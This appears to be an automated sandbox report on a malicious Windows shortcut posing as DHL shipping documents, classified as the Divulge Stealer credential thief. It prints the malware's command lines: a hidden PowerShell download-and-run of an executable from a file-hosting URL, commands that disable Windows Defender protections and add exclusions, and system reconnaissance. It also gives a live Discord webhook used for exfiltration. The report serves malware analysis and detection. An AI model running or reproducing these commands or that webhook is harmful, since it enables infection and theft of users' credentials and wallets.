Windows
Analysis Report
DHL AWB-documents.lnk
Overview
General Information
Detection
Divulge Stealer
Score: | 100 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Antivirus detection for dropped file
Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Windows shortcut file (LNK) starts blacklisted processes
Yara detected Divulge Stealer
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
C2 URLs / IPs found in malware configuration
Drops PE files to the startup folder
Drops PE files with a suspicious file extension
Found many strings related to Crypto-Wallets (likely being stolen)
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Modifies Windows Defender protection settings
Modifies the hosts file
Powershell drops PE file
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Sigma detected: Powershell Defender Disable Scan Feature
Sigma detected: Suspicious Invoke-WebRequest Execution
Sigma detected: Suspicious Startup Folder Persistence
Suspicious powershell command line found
Tries to harvest and steal browser information (history, passwords, etc)
Windows shortcut file (LNK) contains suspicious command line arguments
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: PowerShell Web Download
Sigma detected: Powershell Defender Exclusion
Sigma detected: SCR File Write Event
Sigma detected: Startup Folder File Write
Sigma detected: Suspicious Screensaver Binary File Creation
Sigma detected: Usage Of Web Request Commands And Cmdlets
Stores files to the Windows start menu directory
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara detected Credential Stealer
Classification
- System is w10x64
powershell.exe (PID: 6872 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" -windowsty le hidden -command " & { Invoke -WebReques t -Uri htt ps://files .catbox.mo e/l2rczc.p if -OutFil e $ENV:USE RPROFILE\D ownloads\s etup_x86.e xe; Start- Process $E NV:USERPRO FILE\Downl oads\setup _x86.exe } " MD5: 04029E121A0CFA5991749937DD22A1D9) conhost.exe (PID: 6216 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) setup_x86.exe (PID: 1220 cmdline:
"C:\Users\ user\Downl oads\setup _x86.exe" MD5: E09F55D421CB45340A8C97C217BA56CF) powershell.exe (PID: 3224 cmdline:
"powershel l.exe" Add -MpPrefere nce -Exclu sionPath ' C:\Users\u ser\Downlo ads\setup_ x86.exe' MD5: 04029E121A0CFA5991749937DD22A1D9) conhost.exe (PID: 1208 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) WmiPrvSE.exe (PID: 2848 cmdline:
C:\Windows \system32\ wbem\wmipr vse.exe -s ecured -Em bedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51) powershell.exe (PID: 4024 cmdline:
"powershel l.exe" Set -MpPrefere nce -Disab leIntrusio nPreventio nSystem $t rue -Disab leIOAVProt ection $tr ue -Disabl eRealtimeM onitoring $true -Dis ableScript Scanning $ true -Enab leControll edFolderAc cess Disab led -Enabl eNetworkPr otection A uditMode - Force -MAP SReporting Disabled -SubmitSam plesConsen t NeverSen d && power shell Set- MpPreferen ce -Submit SamplesCon sent 2 MD5: 04029E121A0CFA5991749937DD22A1D9) conhost.exe (PID: 2812 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) WMIC.exe (PID: 3380 cmdline:
"wmic.exe" os get Ca ption MD5: C37F2F4F4B3CD128BDABCAEB2266A785) conhost.exe (PID: 6068 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) WMIC.exe (PID: 3552 cmdline:
"wmic.exe" computers ystem get totalphysi calmemory MD5: C37F2F4F4B3CD128BDABCAEB2266A785) conhost.exe (PID: 6084 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) WMIC.exe (PID: 4044 cmdline:
"wmic.exe" csproduct get uuid MD5: C37F2F4F4B3CD128BDABCAEB2266A785) conhost.exe (PID: 3620 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) powershell.exe (PID: 2828 cmdline:
"powershel l.exe" Get -ItemPrope rtyValue - Path 'HKLM :System\Cu rrentContr olSet\Cont rol\Sessio n Manager\ Environmen t' -Name P ROCESSOR_I DENTIFIER MD5: 04029E121A0CFA5991749937DD22A1D9) conhost.exe (PID: 5004 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) WMIC.exe (PID: 1404 cmdline:
"wmic" pat h win32_Vi deoControl ler get na me MD5: C37F2F4F4B3CD128BDABCAEB2266A785) conhost.exe (PID: 828 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) powershell.exe (PID: 2084 cmdline:
"powershel l.exe" Get -WmiObject -Namespac e "Root\Se curityCent er2" -Clas s AntiViru sProduct | Select-Ob ject -Expa ndProperty displayNa me MD5: 04029E121A0CFA5991749937DD22A1D9) conhost.exe (PID: 4068 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- cleanup
{"Webhook Url": "https://discord.com/api/webhooks/1312882330339119204/DThrH97xNlw4juI_9g0e0fzDhrtHNdex_r-KkDBSRTms8TsaDB_AZHbN51MWJHNb9obG", "Version": "v2.0", "Mutex": "sW7ROjkdVeQ0ALYye0hE"}
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security | ||
JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security | ||
JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security | ||
JoeSecurity_DivulgeStealer | Yara detected Divulge Stealer | Joe Security | ||
JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |
System Summary |
---|
Source: | Author: Florian Roth (Nextron Systems): |
Source: | Author: Florian Roth (Nextron Systems): |
Source: | Author: Nasreddine Bencherchali (Nextron Systems): |
Source: | Author: Nasreddine Bencherchali (Nextron Systems): |
Source: | Author: frack113, Nasreddine Bencherchali (Nextron Systems): |
Source: | Author: Florian Roth (Nextron Systems): |
Source: | Author: Florian Roth (Nextron Systems): |
Source: | Author: Christopher Peacock @securepeacock, SCYTHE @scythe_io: |
Source: | Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research): |
Source: | Author: frack113: |
Source: | Author: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: |
Source: | Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): |
⊘No Suricata rule has matched
Click to jump to signature section
Show All Signature Results
AV Detection |
---|
Source: | Avira: | ||
Source: | Avira: |
Source: | Malware Configuration Extractor: |
Source: | ReversingLabs: | ||
Source: | ReversingLabs: |
Source: | Virustotal: | Perma Link | ||
Source: | ReversingLabs: |
Source: | Integrated Neural Analysis Model: |
Source: | Joe Sandbox ML: | ||
Source: | Joe Sandbox ML: |
Source: | Joe Sandbox ML: |
Source: | Code function: | 3_2_00007FFD34A82B43 |
Source: | File created: | Jump to behavior |
Source: | HTTPS traffic detected: | ||
Source: |